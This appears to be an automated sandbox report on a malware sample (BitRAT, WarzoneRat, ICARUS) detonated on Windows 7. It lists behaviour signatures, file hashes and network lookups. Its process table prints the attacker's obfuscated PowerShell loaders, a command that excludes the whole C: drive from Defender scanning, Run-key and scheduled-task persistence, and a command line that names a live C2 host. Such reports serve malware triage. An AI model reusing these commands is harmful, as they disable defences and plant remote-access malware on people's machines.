Analysis Overview
SHA256
3e2465a42ff87f207327dce94ed7ca4f78c070481ebdb42056b4c10f0a65b6e1
Threat Level: Known bad
The file 8565653741.zip was found to be: Known bad.
Malicious Activity Summary
WarzoneRat, AveMaria
BitRAT
Suspicious use of NtCreateUserProcessOtherParentProcess
Executes dropped EXE
Modifies Installed Components in the registry
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Modifies data under HKEY_USERS
Modifies system certificate store
Modifies registry class
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Suspicious use of SendNotifyMessage
Suspicious use of UnmapMainImage
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-12-15 13:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-12-15 13:24
Reported
2022-12-15 13:27
Platform
win7-20220812-en
Max time kernel
150s
Max time network
43s
Command Line
Signatures
BitRAT
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1472 created 416 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 1624 created 416 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A |
| N/A | N/A | C:\ProgramData\$77images.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77INJECTOR = "C:\\Users\\Admin\\AppData\\Roaming\\$77INJECTOR\\$77INJECTOR.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name" | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1476 set thread context of 1096 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1472 set thread context of 1196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 1624 set thread context of 2144 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\GoogleUpdate.dll | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0df48109110d901 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (blob value omitted) | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\cmd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command Line |
| C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe |
| C:\Windows\system32\services.exe | C:\Windows\system32\services.exe |
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\lsm.exe | C:\Windows\system32\lsm.exe |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs |
| C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe |
| C:\Windows\system32\Dwm.exe | "C:\Windows\system32\Dwm.exe" |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation |
| C:\Windows\system32\sppsvc.exe | C:\Windows\system32\sppsvc.exe |
| \\?\C:\Windows\system32\wbem\WMIADAP.EXE | wmiadap.exe /F /T /R |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Windows\system32\taskhost.exe | "taskhost.exe" |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k RPCSS |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch |
| C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | "C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String' |
| C:\Windows\SysWOW64\cmd.exe | "cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | #cmd |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | #cmd |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA=" |
| C:\Users\Admin\AppData\Local\Temp\$77Install.exe | "C:\Users\Admin\AppData\Local\Temp\$77Install.exe" |
| C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | "C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe" |
| C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | "C:\Users\Admin\AppData\Local\Temp\$77icaro.exe" |
| C:\Windows\system32\taskeng.exe | taskeng.exe {A99EE01B-E8FC-40AC-BFAA-FB04EFD10345} S-1-5-18:NT AUTHORITY\System:Service: |
| C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | "C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe" |
| C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe | "C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe" |
| C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "781834726-469034446389577595-1944380462-2039113711-55127832512762804791238524382" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+'$'+''+[Char](55)+''+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null) |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null) |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.cmdline" |
| C:\Windows\system32\ctfmon.exe | ctfmon.exe |
| C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\system32\AUDIODG.EXE | C:\Windows\system32\AUDIODG.EXE 0xc4 |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit |
| C:\Windows\explorer.exe | "C:\Windows\explorer.exe" |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AE6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F38E3090E14B7DAF50D563E36023E6.TMP" |
| C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{28133f46-3ead-466c-9f65-412012f4dd54} |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Add-MpPreference -ExclusionPath C:\ |
| C:\ProgramData\$77images.exe | "C:\ProgramData\$77images.exe" |
| C:\Windows\SysWOW64\dllhost.exe | C:\Windows\SysWOW64\dllhost.exe /Processid:{900f862d-3775-444b-a619-2e15ccffe35b} |
| C:\Windows\SysWOW64\reg.exe | REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe" |
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
Files
memory/1476-54-0x0000000000210000-0x0000000000AEC000-memory.dmp
memory/1476-55-0x0000000075E51000-0x0000000075E53000-memory.dmp
memory/1996-56-0x0000000000000000-mapping.dmp
memory/604-58-0x0000000000000000-mapping.dmp
memory/840-59-0x0000000000000000-mapping.dmp
memory/1096-60-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-61-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-62-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-64-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-66-0x000000000040159D-mapping.dmp
memory/1096-65-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1096-69-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/1996-70-0x0000000070CC0000-0x000000007126B000-memory.dmp
memory/1792-71-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 11ba16e5ee0670ab6d6b482c52b7fdba |
| SHA1 | 5e530389d8005031f990e4dced5797f8cb9703b7 |
| SHA256 | f5d6bc3e79b6b39eaf4bdff7a02ec6adf6d9564f3f56b08ca85f2aca99a6b45b |
| SHA512 | b4d6489671d0ed6ceafc108fcb8b4598667256dec197422499c0687368a71b395fe49af0134371fa81fa0f202cad7cf5d249d45f424dc28f7765dea5a3543f81 |
C:\Users\Admin\AppData\Local\Temp\$77Install.exe
| MD5 | 2656bb680bc4b4a95ce5cb1443b2850d |
| SHA1 | 3033d5adc32e3df44205408dd3689670756e55a4 |
| SHA256 | 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c |
| SHA512 | 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76 |
memory/524-75-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\$77Install.exe
| MD5 | 2656bb680bc4b4a95ce5cb1443b2850d |
| SHA1 | 3033d5adc32e3df44205408dd3689670756e55a4 |
| SHA256 | 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c |
| SHA512 | 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76 |
C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
| MD5 | f8169767c726f1be7a7e14839cc44d36 |
| SHA1 | 571bcdb58a2017d77593ea1325bac737160b81f4 |
| SHA256 | 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377 |
| SHA512 | c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05 |
memory/568-83-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/1572-88-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
| MD5 | eb51a99599683b7b3d47981722da5218 |
| SHA1 | e693b669e2c309869ce31f13661ba6eb3d3b0566 |
| SHA256 | 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38 |
| SHA512 | 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba |
\Users\Admin\AppData\Local\Temp\$77icaro.exe
| MD5 | eb51a99599683b7b3d47981722da5218 |
| SHA1 | e693b669e2c309869ce31f13661ba6eb3d3b0566 |
